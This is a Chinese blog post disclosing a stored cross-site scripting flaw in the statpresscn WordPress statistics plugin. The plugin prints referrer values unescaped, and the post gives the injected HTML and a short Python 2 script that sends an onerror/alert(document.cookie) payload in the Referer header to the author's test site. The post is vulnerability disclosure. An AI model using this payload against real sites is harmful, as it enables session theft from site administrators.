之前这篇文章放在草稿箱中很久了，最近我要清理博客的数据库，就发表出来吧。

 

statpresscn是流行的wordpress站点统计插件的中文版，虽然已经很久未更新，而且wp官网统计也仅仅不到10万次下载；但因为这个插件被某国内wp托管服务商（对方宣称拥有数百万用户）作为内置插件被默认启用，所以危害还是有些大的。

 

 

 

 

在统计页面中，可以详细记录站点的每次访问。其中流量来源展示时，提供一个表格输出来源网站，而statpress的中文版未进行字符串过滤直接输出。

 

攻击代码构建

正常用户访问时，统计展示页面输出如下：

 

 <td> <a href = "http://blog.leniy.org" target = "_statpresscn" > http://blog.leniy.org </a></td>

 

 

通过构建refer的值，可以将其更改为：

 

<td> <a href = '' > "><img src=a onerror=alert(document.cookie)>' target=_statpresscn>'>" > <img src = a onerror = alert ( document . cookie ) > </a></td>

 

 

则python代码如下：

 

 

# -*- coding: utf-8 -*-

"""
Created: on Sun Sep 01 22:34:17 2013

Modified on Mon Sep 30 10:56:31 2013

@author: Leniy
"""

import urllib2

request = urllib2 . Request ( 'http://test.leniy.org/?s=' )

request . add_header ( 'User-Agent' , 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5' )

#request.add_header('Referer', 'http://blog.leniy.org')

request . add_header ( 'Referer' , '\'>"><img src=a onerror=alert(document.cookie)>' )response = urllib2 . urlopen ( request )